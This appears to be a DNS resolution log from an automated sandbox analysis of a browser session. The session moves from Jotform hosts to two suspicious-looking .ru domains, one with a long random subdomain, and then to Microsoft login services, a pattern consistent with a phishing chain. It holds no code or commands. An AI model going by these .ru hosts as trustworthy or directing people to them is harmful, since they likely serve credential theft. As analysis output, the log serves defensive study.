                                                                                                                                                                                                                                            Jan 10, 2025 13:37:32.716828108 CET192.168.2.171.1.1.10x286dStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:35.734344959 CET192.168.2.171.1.1.10x4102Standard query (0)fpt.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:35.734486103 CET192.168.2.171.1.1.10xc83eStandard query (0)fpt.live.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:37.232251883 CET192.168.2.171.1.1.10x2ffStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:37.232415915 CET192.168.2.171.1.1.10xb944Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:38.559951067 CET192.168.2.171.1.1.10x1db8Standard query (0)fpt.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:38.560286045 CET192.168.2.171.1.1.10x9651Standard query (0)fpt.live.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:53.332946062 CET192.168.2.171.1.1.10x673cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:53.333192110 CET192.168.2.171.1.1.10x7bStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:54.803085089 CET192.168.2.171.1.1.10x2042Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:54.803294897 CET192.168.2.171.1.1.10xa56bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:56.384501934 CET192.168.2.171.1.1.10x6a80Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:56.384658098 CET192.168.2.171.1.1.10xe6eaStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:58.380753040 CET192.168.2.171.1.1.10x9f37Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:58.380867958 CET192.168.2.171.1.1.10xb760Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:54.284507036 CET1.1.1.1192.168.2.170xdfecNo error (0)eu.jotform.com104.19.128.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:54.284507036 CET1.1.1.1192.168.2.170xdfecNo error (0)eu.jotform.com104.19.129.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:54.284687996 CET1.1.1.1192.168.2.170x8ceNo error (0)eu.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.372915030 CET1.1.1.1192.168.2.170xfaeeNo error (0)cdn.jotfor.ms172.67.7.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.372915030 CET1.1.1.1192.168.2.170xfaeeNo error (0)cdn.jotfor.ms104.22.72.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.372915030 CET1.1.1.1192.168.2.170xfaeeNo error (0)cdn.jotfor.ms104.22.73.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.373219013 CET1.1.1.1192.168.2.170x78daNo error (0)cdn.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.373760939 CET1.1.1.1192.168.2.170x5c97No error (0)cdn02.jotfor.ms172.67.7.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.373760939 CET1.1.1.1192.168.2.170x5c97No error (0)cdn02.jotfor.ms104.22.73.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.373760939 CET1.1.1.1192.168.2.170x5c97No error (0)cdn02.jotfor.ms104.22.72.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.374152899 CET1.1.1.1192.168.2.170xcb2fNo error (0)cdn03.jotfor.ms104.22.72.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.374152899 CET1.1.1.1192.168.2.170xcb2fNo error (0)cdn03.jotfor.ms104.22.73.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.374152899 CET1.1.1.1192.168.2.170xcb2fNo error (0)cdn03.jotfor.ms172.67.7.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.374948025 CET1.1.1.1192.168.2.170xc17eNo error (0)cdn01.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.375103951 CET1.1.1.1192.168.2.170xdd99No error (0)cdn01.jotfor.ms104.22.72.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.375103951 CET1.1.1.1192.168.2.170xdd99No error (0)cdn01.jotfor.ms104.22.73.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.375103951 CET1.1.1.1192.168.2.170xdd99No error (0)cdn01.jotfor.ms172.67.7.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.375580072 CET1.1.1.1192.168.2.170xcaf7No error (0)cdn02.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.376713991 CET1.1.1.1192.168.2.170xfac1No error (0)cdn03.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.992539883 CET1.1.1.1192.168.2.170xfcacNo error (0)cdn02.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.994090080 CET1.1.1.1192.168.2.170x77cNo error (0)cdn02.jotfor.ms172.67.7.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.994090080 CET1.1.1.1192.168.2.170x77cNo error (0)cdn02.jotfor.ms104.22.73.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.994090080 CET1.1.1.1192.168.2.170x77cNo error (0)cdn02.jotfor.ms104.22.72.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.996994019 CET1.1.1.1192.168.2.170x5b95No error (0)js.jotform.com104.19.128.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.996994019 CET1.1.1.1192.168.2.170x5b95No error (0)js.jotform.com104.19.129.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:55.997663975 CET1.1.1.1192.168.2.170xa1cbNo error (0)js.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.595835924 CET1.1.1.1192.168.2.170x387cNo error (0)cdn03.jotfor.ms104.22.72.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.595835924 CET1.1.1.1192.168.2.170x387cNo error (0)cdn03.jotfor.ms172.67.7.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.595835924 CET1.1.1.1192.168.2.170x387cNo error (0)cdn03.jotfor.ms104.22.73.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.596196890 CET1.1.1.1192.168.2.170x74f5No error (0)cdn03.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.640135050 CET1.1.1.1192.168.2.170xa566No error (0)js.jotform.com104.19.128.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.640135050 CET1.1.1.1192.168.2.170xa566No error (0)js.jotform.com104.19.129.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.641474009 CET1.1.1.1192.168.2.170xf8b4No error (0)js.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.774221897 CET1.1.1.1192.168.2.170x8ac4No error (0)cdn01.jotfor.ms104.22.72.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.774221897 CET1.1.1.1192.168.2.170x8ac4No error (0)cdn01.jotfor.ms172.67.7.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.774221897 CET1.1.1.1192.168.2.170x8ac4No error (0)cdn01.jotfor.ms104.22.73.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:56.774280071 CET1.1.1.1192.168.2.170xa961No error (0)cdn01.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:58.274460077 CET1.1.1.1192.168.2.170xfeefNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:58.274741888 CET1.1.1.1192.168.2.170x3f3eNo error (0)www.google.com142.250.186.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.381812096 CET1.1.1.1192.168.2.170x7a5aNo error (0)o61806.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.658830881 CET1.1.1.1192.168.2.170x293No error (0)eu.jotform.com104.19.128.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.658830881 CET1.1.1.1192.168.2.170x293No error (0)eu.jotform.com104.19.129.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:35:59.659374952 CET1.1.1.1192.168.2.170xb5b1No error (0)eu.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:00.013356924 CET1.1.1.1192.168.2.170x8a3aNo error (0)eu-files.jotform.com34.107.251.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:00.058993101 CET1.1.1.1192.168.2.170x3249No error (0)o61806.ingest.sentry.io34.120.195.249A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:00.798403978 CET1.1.1.1192.168.2.170x9563No error (0)eu-files.jotform.com34.107.251.125A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:01.432109118 CET1.1.1.1192.168.2.170x48d2No error (0)cdn.jotfor.ms104.22.73.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:01.432109118 CET1.1.1.1192.168.2.170x48d2No error (0)cdn.jotfor.ms172.67.7.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:01.432109118 CET1.1.1.1192.168.2.170x48d2No error (0)cdn.jotfor.ms104.22.72.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:01.432847977 CET1.1.1.1192.168.2.170x761bNo error (0)cdn.jotfor.ms65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.135010958 CET1.1.1.1192.168.2.170x4628No error (0)events.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.137531042 CET1.1.1.1192.168.2.170xd668No error (0)events.jotform.com104.19.129.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.137531042 CET1.1.1.1192.168.2.170xd668No error (0)events.jotform.com104.19.128.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.155026913 CET1.1.1.1192.168.2.170xc66cNo error (0)www.jotform.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.155394077 CET1.1.1.1192.168.2.170x6360No error (0)www.jotform.com104.19.128.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:19.155394077 CET1.1.1.1192.168.2.170x6360No error (0)www.jotform.com104.19.129.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.395778894 CET1.1.1.1192.168.2.170x75b7No error (0)dm9h.zomivane.ru65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.404994011 CET1.1.1.1192.168.2.170x27c4No error (0)dm9h.zomivane.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.404994011 CET1.1.1.1192.168.2.170x27c4No error (0)dm9h.zomivane.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.404994011 CET1.1.1.1192.168.2.170x27c4No error (0)dm9h.zomivane.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.404994011 CET1.1.1.1192.168.2.170x27c4No error (0)dm9h.zomivane.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.404994011 CET1.1.1.1192.168.2.170x27c4No error (0)dm9h.zomivane.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.404994011 CET1.1.1.1192.168.2.170x27c4No error (0)dm9h.zomivane.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:32.404994011 CET1.1.1.1192.168.2.170x27c4No error (0)dm9h.zomivane.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.937669039 CET1.1.1.1192.168.2.170x5ce3No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.937669039 CET1.1.1.1192.168.2.170x5ce3No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.937669039 CET1.1.1.1192.168.2.170x5ce3No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.937669039 CET1.1.1.1192.168.2.170x5ce3No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.938090086 CET1.1.1.1192.168.2.170x7558No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.938090086 CET1.1.1.1192.168.2.170x7558No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.938649893 CET1.1.1.1192.168.2.170xe0f6No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.938649893 CET1.1.1.1192.168.2.170xe0f6No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.938935995 CET1.1.1.1192.168.2.170x40bdNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:33.938975096 CET1.1.1.1192.168.2.170xa7b0No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.647768021 CET1.1.1.1192.168.2.170x4403No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.647768021 CET1.1.1.1192.168.2.170x4403No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.648024082 CET1.1.1.1192.168.2.170xe5e2No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.720082998 CET1.1.1.1192.168.2.170x485bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.720082998 CET1.1.1.1192.168.2.170x485bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.720082998 CET1.1.1.1192.168.2.170x485bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:34.720082998 CET1.1.1.1192.168.2.170x485bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.250679016 CET1.1.1.1192.168.2.170x6041No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.251293898 CET1.1.1.1192.168.2.170xac97No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.251293898 CET1.1.1.1192.168.2.170xac97No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.267009020 CET1.1.1.1192.168.2.170x23d9No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.267009020 CET1.1.1.1192.168.2.170x23d9No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:35.267039061 CET1.1.1.1192.168.2.170x369No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:37.225972891 CET1.1.1.1192.168.2.170x1ce3No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:44.533675909 CET1.1.1.1192.168.2.170x1a33No error (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:44.533675909 CET1.1.1.1192.168.2.170x1a33No error (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:44.533704996 CET1.1.1.1192.168.2.170x3480No error (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:46.019742012 CET1.1.1.1192.168.2.170x76f8No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:46.019773006 CET1.1.1.1192.168.2.170x28c4No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:46.025778055 CET1.1.1.1192.168.2.170xa890No error (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru65IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:46.114567041 CET1.1.1.1192.168.2.170xf7f4No error (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:46.114567041 CET1.1.1.1192.168.2.170xf7f4No error (0)sh81xdbszq0gozj9jyxyzajxmxsyl2omho07oxsdwphufgugjbwcyyem.deryposi.ru188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:47.113131046 CET1.1.1.1192.168.2.170xda8aNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:47.113131046 CET1.1.1.1192.168.2.170xda8aNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:47.113289118 CET1.1.1.1192.168.2.170xac44No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:47.113289118 CET1.1.1.1192.168.2.170xac44No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:48.261842012 CET1.1.1.1192.168.2.170xd414No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:48.261842012 CET1.1.1.1192.168.2.170xd414No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:49.142119884 CET1.1.1.1192.168.2.170xbfe2No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:49.142119884 CET1.1.1.1192.168.2.170xbfe2No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:49.173626900 CET1.1.1.1192.168.2.170x27ddNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:49.173626900 CET1.1.1.1192.168.2.170x27ddNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:49.205152035 CET1.1.1.1192.168.2.170xf5beNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:49.205152035 CET1.1.1.1192.168.2.170xf5beNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:50.289830923 CET1.1.1.1192.168.2.170xcb00No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:50.289830923 CET1.1.1.1192.168.2.170xcb00No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:50.289830923 CET1.1.1.1192.168.2.170xcb00No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:50.290555954 CET1.1.1.1192.168.2.170x8772No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:36:50.290555954 CET1.1.1.1192.168.2.170x8772No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:32.723689079 CET1.1.1.1192.168.2.170x4653No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:32.724006891 CET1.1.1.1192.168.2.170x286dNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.152631044 CET1.1.1.1192.168.2.170x4943No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.152631044 CET1.1.1.1192.168.2.170x4943No error (0)dual.s-part-0017.t-0009.fb-t-msedge.nets-part-0017.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.152631044 CET1.1.1.1192.168.2.170x4943No error (0)s-part-0017.t-0009.fb-t-msedge.net13.107.253.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.152641058 CET1.1.1.1192.168.2.170x6d0cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.152641058 CET1.1.1.1192.168.2.170x6d0cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.165760994 CET1.1.1.1192.168.2.170xcd6aNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.165760994 CET1.1.1.1192.168.2.170xcd6aNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.167459011 CET1.1.1.1192.168.2.170x7876No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.167459011 CET1.1.1.1192.168.2.170x7876No error (0)sni1gl.wpc.alphacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.168678999 CET1.1.1.1192.168.2.170xb0c0No error (0)scdn38c07.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.176326036 CET1.1.1.1192.168.2.170xe8c1No error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.176821947 CET1.1.1.1192.168.2.170x5c7No error (0)scdn1efff.wpc.9da5e.alphacdn.netsni1gl.wpc.alphacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.176821947 CET1.1.1.1192.168.2.170x5c7No error (0)sni1gl.wpc.alphacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.177702904 CET1.1.1.1192.168.2.170x82d4No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:34.177702904 CET1.1.1.1192.168.2.170x82d4No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:35.304779053 CET1.1.1.1192.168.2.170xc436No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:35.304779053 CET1.1.1.1192.168.2.170xc436No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:35.836592913 CET1.1.1.1192.168.2.170x4102No error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:35.837162971 CET1.1.1.1192.168.2.170xc83eNo error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:37.239932060 CET1.1.1.1192.168.2.170xb944No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:37.240900993 CET1.1.1.1192.168.2.170x2ffNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:38.567285061 CET1.1.1.1192.168.2.170x1db8No error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 10, 2025 13:37:38.586702108 CET1.1.1.1192.168.2.170x9651No error (0)fpt.live.comfpt.microsoft.comCNAME (Canonical name)IN (0x0001)false
